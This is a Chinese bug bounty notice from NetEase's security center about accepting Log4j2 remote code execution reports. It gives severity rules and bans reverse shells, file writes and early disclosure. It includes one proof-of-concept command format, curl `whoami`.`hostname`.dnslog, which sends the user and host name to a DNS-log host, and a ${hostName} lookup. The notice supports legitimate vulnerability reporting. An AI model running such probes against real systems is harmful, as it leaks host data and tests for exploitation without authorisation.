关于开始接收Log4j2远程代码执行漏洞的通知二
致各位亲爱的白帽子:
经过第一阶段log4j漏洞的收集和跟进,NSRC将于6月9日开始开放全部业务接收Apache Log4j2相关漏洞。
1、发现目标存在log4j漏洞后,其评级标准:
证明能执行命令为高危,参照格式curl `whoami`.`hostname`.dnslog;证明通过${hostName}获取hostname的为低危。
2、不允许测试过程中进行写入文件、反弹shell、内网渗透等恶意操作,否则该行为视为违规,情节严重者将追究法律责任。更多细节请参考《src行业安全测试规范》。
3、在漏洞未经修复前,严禁对外披露漏洞详情,否则将取消所有奖励。
4、漏洞等级会按照漏洞实际影响和危害会进行调整。
5、Apache Log4j2漏洞不参与任何活动,包括但不限于主打产品、积分翻倍、年度季度奖励等。
感谢各位的支持与理解~
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 中国经济向世界提供“机遇清单” 7904268
- 2 朱元璋换帅照后明孝陵火了 7808159
- 3 水银体温计将禁产 有网友囤货100支 7712771
- 4 2025这些“经济”持续成长壮大 7616626
- 5 近8000吨车厘子来了 7524211
- 6 老人接孙女从认不出到相拥大哭 7427955
- 7 冯提莫自曝癌症复发并转移 7332198
- 8 西班牙女员工连续提前到岗被开除 7236779
- 9 男子毒杀儿女案细节披露 7139756
- 10 寒潮来袭!多地气温将创下半年来新低 7043765







网易安全中心
